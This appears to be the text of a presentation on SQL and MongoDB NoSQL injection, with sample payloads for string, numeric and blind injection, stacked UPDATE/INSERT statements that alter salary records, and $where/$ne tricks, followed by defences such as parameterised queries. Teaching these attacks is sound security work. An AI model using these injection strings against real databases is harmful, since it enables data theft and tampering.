Presentations
Templates
Features
Teams
Pricing
Log in
Sign up

Log in
Sign up

SQL and NoSQL Injection

Lavanya Mohan

Sailee Bhekare

SQL and NoSQL Injection

Select * from users where user_id = <i/p>

Easy to Exploit

Common

Severe Impact

Techniques for Exploiting

SQL Injection

Fingerprinting the DB
String SQL Injection
Numeric SQL Injection
Blind Numeric Injection
Blind String Injection

Fingerprinting the DB

String SQL Injection

Select * from user_data where last_name = ' Smith '

Smith' OR '1'='1

Select * from user_data

where last_name = ' Smith' OR '1'='1 '

Numeric SQL Injection

Select * from weather_data where station =

101 OR 1=1

Blind Numeric SQL Injection

101 AND ((Select pin from pins

where cc_number ='1111222233334444')>2500)

Blind String SQL Injection

101 AND((Select name from pins

where cc_number ='4321432143214321')>'E');

More on SQL Injection

Update
Insert

Update

Select * from SALARIES where USERID = ' jsmith '

jsmith'; Update SALARIES

SET SALARY='50000' where USERID='jsmith

Insert

Select * from SALARIES where USERID = ' jsmith '

jsmith'; Insert into SALARIES

VALUES ('hpotter','10000000')

;--

Is

No SQL = No Injections??

Example Of MongoDB NoSQL Injection

Typical User Form:

db.characters.find({"name" : "Robb"})

Example 1 :

db.characters.find( { name : 'Robb

', $where: 'function() { sleep(5000);

return this.name=="Robb"}

'})

Example 2 :
Using String Manipulation

db.characters.find({name:'abd

', name:{$ne: 'Robb'} ,address:'Casterly Rock
'})

Parameterised Queries

SQL

NoSQL

Input Validation

Use Appropriate Privileges

Proper Error Messages

Keep Secrets Secret !!

References

https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)#Standard_SQL_Injection_Testing
https://www.owasp.org/index.php?title=Testing_for_NoSQL_injection&setlang=en
https://github.com/shirish4you/NoSQLInjectionDemo

https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

http://www.syhunt.com/?n=Articles.NoSQLInjection

https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project

SQL and NoSQL Injection Lavanya Mohan Sailee Bhekare

SQL and NoSQL Injection

By Lavanya Mohan

Made with Slides.com

SQL and NoSQL Injection

11 years ago
797

Lavanya Mohan

More from Lavanya Mohan

istanbul_trip

Lavanya Mohan

126
Thinking Gems

Lavanya Mohan

333

Tour

Presentations Trending decks Templates Features Pricing Slides for Teams Slides for Developers

Help

Forum Knowledge Base Developers Docs Leave Feedback Report an Issue

Company

News Changelog About Slides Security Partners

Resources

Make slides with AI Embed Google Maps Embed Google Forms Embed YouTube Convert PDF to Slides Convert PPT to Slides Convert Markdown to Slides

Terms • Privacy • © 2025 Slides, Inc.

BESbswyBESbswy